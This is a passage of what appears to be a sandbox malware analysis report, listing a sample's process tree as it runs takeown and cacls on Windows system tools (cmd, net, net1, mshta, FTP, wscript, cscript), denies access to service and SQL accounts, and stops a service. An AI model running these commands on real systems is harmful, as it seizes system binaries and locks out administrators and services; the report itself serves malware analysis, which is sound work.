    cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
    3⤵
    PID:4848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4172
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d "network service"
    3⤵
    PID:4768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2108
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /g system:r
    3⤵
    PID:3420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\cmd.exe /a
    3⤵
    - Modifies file permissions
    PID:1396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1168
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
    3⤵
    PID:3724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
    3⤵
    PID:3132
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
    3⤵
    PID:3704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3932
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
    3⤵
    PID:5024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1164
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
    3⤵
    PID:272
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
    3⤵
    PID:2440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4188
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
    3⤵
    PID:1316
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
    3⤵
    PID:4284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2404
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\net.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /g Administrators:f
    3⤵
    PID:5012
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /g Users:r
    3⤵
    PID:2644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /g Administrators:r
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:840
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d SERVICE
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3848
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d mssqlserver
    3⤵
    PID:3972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d "network service"
    3⤵
    PID:4560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1168
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d system
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4420
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\net.exe /a
    3⤵
    - Modifies file permissions
    PID:3628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
    3⤵
    PID:2616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
    3⤵
    PID:4796
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
    3⤵
    PID:3744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:372
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
    3⤵
    PID:3404
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4160
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d system
    3⤵
    PID:3472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2240
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
    3⤵
    PID:3628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\net1.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4956
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /g Administrators:f
    3⤵
    PID:3772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3984
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /g Users:r
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3648
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /g Administrators:r
    3⤵
    PID:3032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2784
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d SERVICE
    3⤵
    PID:4608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:228
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d mssqlserver
    3⤵
    PID:4292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3764
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d "network service"
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d system
    3⤵
    PID:3600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5088
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\net1.exe /a
    3⤵
    - Modifies file permissions
    PID:4628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
    3⤵
    PID:3668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4128
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
    3⤵
    PID:3704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5024
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
    3⤵
    PID:724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
    3⤵
    PID:3304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:276
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d system
    3⤵
    PID:4012
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
    3⤵
    PID:864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\mshta.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3404
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /g Administrators:f
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4184
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /g Users:r
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
    3⤵
    PID:232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:640
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d SERVICE
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4204
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d "network service"
    3⤵
    PID:3504
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d system
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3564
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
    3⤵
    PID:4308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\mshta.exe /a
    3⤵
    - Modifies file permissions
    PID:4784
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
    3⤵
    PID:3516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
    3⤵
    PID:844
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
    3⤵
    PID:1676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:908
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
    3⤵
    PID:4616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4288
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
    3⤵
    PID:5116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
    3⤵
    PID:4172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4956
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d system
    3⤵
    PID:4220
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3768
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\FTP.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3408
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /g Administrators:f
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /g Users:r
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d SERVICE
    3⤵
    PID:3848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3664
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
    3⤵
    PID:3632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3380
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d "network service"
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d system
    3⤵
    PID:2216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
    3⤵
    PID:3136
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\FTP.exe /a
    3⤵
    - Modifies file permissions
    PID:2436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2352
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
    3⤵
    PID:1260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4912
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
    3⤵
    PID:428
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4672
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
    3⤵
    PID:4892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4644
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d system
    3⤵
    PID:920
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
    3⤵
    PID:2840
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop UIODetect
      4⤵
      PID:4996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\wscript.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3172
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /g Administrators:f
    3⤵
    PID:1164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:272
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /g Users:r
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2608
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d SERVICE
    3⤵
    PID:4344
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
    3⤵
    PID:4172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3236
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d "network service"
    3⤵
    PID:3136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4168
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d system
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4348
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\wscript.exe /a
    3⤵
    - Modifies file permissions
    PID:2960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
    3⤵
    PID:4308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3216
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
    3⤵
    PID:4916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3140
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:268
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
    3⤵
    PID:4208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
    3⤵
    PID:4204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
    3⤵
    PID:3132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3404
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d system
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:4304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\cscript.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1676
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /g Administrators:f
    3⤵
    PID:908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /g Users:r
    3⤵
    PID:4172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d SERVICE
    3⤵
    PID:4168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
    3⤵
    PID:432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3388
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d "network service"
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d system
    3⤵
    PID:2980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4780
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:4740
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\cscript.exe /a
    3⤵
    - Modifies file permissions
    PID:2040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3620
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
    3⤵
    PID:640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3580
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4132
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
    3⤵
    PID:5000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3384
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
    3⤵
    PID:4668
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
    3⤵
    PID:4348
